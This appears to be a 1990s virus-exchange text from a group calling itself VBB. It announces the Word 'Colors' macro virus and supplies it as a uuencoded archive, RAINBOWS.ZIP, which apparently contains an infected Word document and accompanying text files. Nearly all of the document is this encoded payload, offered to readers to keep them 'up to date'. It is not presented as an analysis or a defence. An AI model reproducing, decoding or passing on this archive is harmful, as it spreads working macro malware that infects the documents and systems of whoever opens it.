			The Colors Macro Virus
			----------------------

	Well, as you probably know there is a (kind of)new virus around.
	The word macro virus.  Here at VBB were always busy investigating
	new viral trends for you so that you'll be up to date.  Well, here it
	is:  The colors macro virus in uue.

-----------------------------------------------------------------------------
begin 644 RAINBOWS.ZIP
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
MI4EV]0TC>%PT1:W,.J[D/'-HFFVGZPGNAK>!5M:&D[X;EZLJ@MZDIF%O(RXG
M;X+.P;J'/.M-B:O76BJT54AZ('0`)-!\Z^OE#-[24_8AMFH^=REEOR;2[,>F
MCXO=$U`7=O(T`,;QNIC0@`XV?8FJ(J1EXZ*]@]/P#-WAK4[1GC@_$:@7=9ZU
M>EV':8<F"H-].D4=2\;DGKY\TMN$C>SN.+H\VPO(`0#F&SSM]!VD`\H3M:/4
M7CR`79$UV.XRRA$UKU$C:I::HE:E\<57Q<WMU^N++\M/MW>O)[E=8'+I,14K
M>PR"$?GT#JMBK0<OG"323XOSS&V,(Z"!JE2]:*(T-;#Y2(_\BD\544(%OJ]Z
MB`9@B["];L*)-LN9Z7QFHR<9\=^0NWZMA+C_`U!+`0(4`!0``@`(`&&KC2!O
M&XI%)P(``!\&```+``````````$`(`````````!214%$7T]2+D1)15!+`0(4
M`!0``@`(`-Q%4Q_\_N@,=Q(````Z```,````````````(````%`"``!204E.
M0D]7,BY$3T-02P$"%``4``(`"`!AJHT@2'MHP3`!``!(`P``"P`````````!
M`"````#Q%```0T],3U)3.2Y46%102P$"%``4``(`"`!8JHT@0<]'*9$!``#=
M!```"P`````````!`"````!*%@``0T],3U)3."Y46%102P$"%``4``(`"`!+
MJHT@--KH'\0```"%`0``"P`````````!`"`````$&```0T],3U)3-RY46%10
M2P$"%``4``(`"``ZJHT@6,):H@4!``!4`@``"P`````````!`"````#Q&```
M0T],3U)3-BY46%102P$"%``4``(`"``UJHT@"VD[S.X```#<`0``"P``````
M```!`"`````?&@``0T],3U)3-2Y46%102P$"%``4``(`"``OJHT@TFF,A<8`
M``"#`0``"P`````````!`"`````V&P``0T],3U)3-"Y46%102P$"%``4``(`
M"``DJHT@2K&-CC<````^````"P`````````!`"`````E'```0T],3U)3,RY4
M6%102P$"%``4``(`"``8JHT@SD^^GS4!``#<`@``"P`````````!`"````"%
M'```0T],3U)3,BY46%102P$"%``4``(`"``.JHT@1'@2*3L%```C&0``"P``
M```````!`"````#C'0``0T],3U)3,2Y46%102P$"%``4``(`"`#QJHT@:Z:,
M[&<$``!V"@``"@`````````!`"````!'(P``0T],3U)3+E185%!+!08`````
.#``,`*P"``#6)P``````
`
end
sum -r/size 51452/10904
---------------------------------------------------------------------------
	